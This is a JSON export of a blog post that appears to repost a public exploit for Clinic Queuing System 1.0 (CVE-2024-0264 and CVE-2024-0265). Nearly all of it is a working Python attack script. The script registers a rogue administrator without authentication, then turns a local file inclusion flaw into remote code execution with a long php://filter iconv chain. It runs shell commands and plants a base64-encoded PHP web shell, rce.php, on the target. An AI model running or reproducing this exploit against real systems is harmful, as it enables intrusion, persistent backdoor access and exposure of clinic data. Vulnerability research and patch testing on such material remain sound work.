{"id":56717,"date":"2024-05-09T20:30:00","date_gmt":"2024-05-09T16:30:00","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/178519\/clinicqs10-exec.txt"},"modified":"2024-05-09T20:30:00","modified_gmt":"2024-05-09T16:30:00","slug":"clinic-queuing-system-1-0-remote-code-execution","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/clinic-queuing-system-1-0-remote-code-execution\/","title":{"rendered":"Clinic Queuing System 1.0 Remote Code Execution"},"content":{"rendered":"<p># Exploit Title: Clinic Queuing System 1.0 RCE <br \/># Date: 2024\/1\/7<br \/># Exploit Author: Juan Marco Sanchez<br \/># Vendor Homepage: https:\/\/www.sourcecodester.com\/<br \/># Software Link: https:\/\/www.sourcecodester.com\/php\/16439\/clinic-queuing-system-using-php-and-sqlite3-source-code-free-download.html<br \/># Version: 1.0<br \/># Tested on: Debian Linux Apache Web Server<br \/># CVE: CVE-2024-0264 (phase 1: unauthenticated admin account creation via LoginRegistration.php?a=save_user) and CVE-2024-0265 (phase 2: local file inclusion via the ?page= parameter, turned into RCE with a php:\/\/filter conversion chain after logging in as the created user)<br \/># Note: die() is not a Python builtin; the failure branches below raise NameError, which the bare except at the bottom reports as &#8220;Exploit failed.&#8221;<\/p>\n<p>import requests<br \/>import random<br \/>import argparse<br \/>from bs4 import BeautifulSoup<\/p>\n<p>parser = argparse.ArgumentParser()<br \/>parser.add_argument(&#8220;target&#8221;)<br \/>args = parser.parse_args()<\/p>\n<p>base_url = args.target<br \/>phase1_url = base_url + &#8216;\/LoginRegistration.php?a=save_user&#8217;<br \/>phase2_url = base_url + &#8216;\/LoginRegistration.php?a=login&#8217;<\/p>\n<p>filter_chain = 
&#8220;php:\/\/filter\/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.UCS2.UTF-8|convert.iconv.CSISOLATIN6.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.SJIS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT_JISX0213|convert.iconv.UHC.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT_JISX0213|convert.iconv.UHC.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8
859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode\/resource
=home&#8221;<\/p>\n<p>def phase1(): # CVE-2024-0264<br \/>rand_user = &#8216;pwn_&#8217;+str(random.randint(100, 313))<br \/>rand_pass = &#8216;pwn_&#8217;+str(random.randint(100, 313))<br \/>pwn_user_data = {&#8216;formToken&#8217;:&#8221;,&#8217;fullname&#8217;:&#8217;pwn!&#8217;,&#8217;username&#8217;:rand_user,&#8217;password&#8217;:rand_pass,&#8217;status&#8217;:1,&#8217;type&#8217;:1}<br \/>print(&#8220;[*] adding administrator &#8221; + rand_user + &#8220;:&#8221; + rand_pass)<br \/>phase1 = requests.post(phase1_url, pwn_user_data)<br \/>if &#8220;User Account has been added successfully.&#8221; in phase1.text:<br \/>print(&#8220;[+] Phase 1 Success &#8211; Admin user added!\\n&#8221;)<br \/>print(&#8220;[*] Initiating Phase 2&#8221;)<br \/>phase2(rand_user, rand_pass)<br \/>else:<br \/>print(&#8220;[X] user creation failed :(&#8220;)<br \/>die()<\/p>\n<p>def phase2(user, password): # CVE-2024-0265<br \/>s = requests.Session();<br \/>login_data = {&#8216;formToken&#8217;:&#8221;,&#8217;username&#8217;:user, &#8216;password&#8217;:password}<br \/>print(&#8220;[*] Loggin in&#8230;.&#8221;)<br \/>phase2 = s.post(phase2_url, login_data)<\/p>\n<p>if &#8220;Login successfully.&#8221; in phase2.text:<br \/>print(&#8220;[+] Login success&#8221;)<br \/>else:<br \/>print(&#8220;[X] Login failed.&#8221;)<br \/>die()<\/p>\n<p>print(&#8220;[+] Preparing for RCE via LFI PHP FIlter Chaining&#8230;\\n&#8221;)<br \/>rce_url = base_url + &#8220;\/?page=&#8221; + filter_chain + &#8220;&amp;0=echo &#8216;|jmrcsnchz|&lt;pre&gt;&#8217;.shell_exec(&#8216;id&#8217;).'&lt;\/pre&gt;&#8217;;&#8221;<br \/>#print(&#8220;[*] Payload: &#8221; + rce_url)<br \/>rce = s.get(rce_url)<\/p>\n<p>if &#8220;jmrcsnchz&#8221; in rce.text:<br \/>print(&#8220;[+] RCE success!&#8221;)<br \/>soup = BeautifulSoup(rce.text, &#8216;html.parser&#8217;)<br \/>print(&#8220;[+] Output of id: &#8221; + soup.pre.get_text())<br \/>print(&#8220;[*] Uploading php backdoor&#8230;.&#8221;)<br \/>s.get(base_url + 
&#8220;\/?page=&#8221; + filter_chain + &#8220;&amp;0=file_put_contents(&#8216;rce.php&#8217;,base64_decode(&#8216;PD89YCRfR0VUWzBdYD8%2b&#8217;));&#8221;)<br \/>print(&#8220;[+] Access at &#8221; + base_url + &#8220;\/rce.php?0=whoami&#8221;)<br \/>else:<br \/>print(&#8220;[X] Exploit failed. Try debugging the script or pass this script onto a proxy to investigate.&#8221;)<br \/>die()<\/p>\n<p>try:<br \/>print(&#8220;[*] Initiating Phase 1&#8221;)<br \/>phase1()<br \/>except:<br \/>print(&#8220;Exploit failed.&#8221;)<\/p>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: Clinic Queuing System 1.0 RCE # Date: 2024\/1\/7# Exploit Author: Juan Marco Sanchez# Vendor Homepage: https:\/\/www.sourcecodester.com\/# Software Link: https:\/\/www.sourcecodester.com\/php\/16439\/clinic-queuing-system-using-php-and-sqlite3-source-code-free-download.html# Version: 1.0# Tested on: Debian Linux Apache Web Server# CVE: CVE-2024-0264 and CVE-2024-0265 import requestsimport randomimport argparsefrom bs4 import BeautifulSoup parser = argparse.ArgumentParser()parser.add_argument(&#8220;target&#8221;)args = parser.parse_args() base_url = args.targetphase1_url = base_url + &#8216;\/LoginRegistration.php?a=save_user&#8217;phase2_url = 
&hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-56717","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56717","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=56717"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56717\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=56717"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=56717"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=56717"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}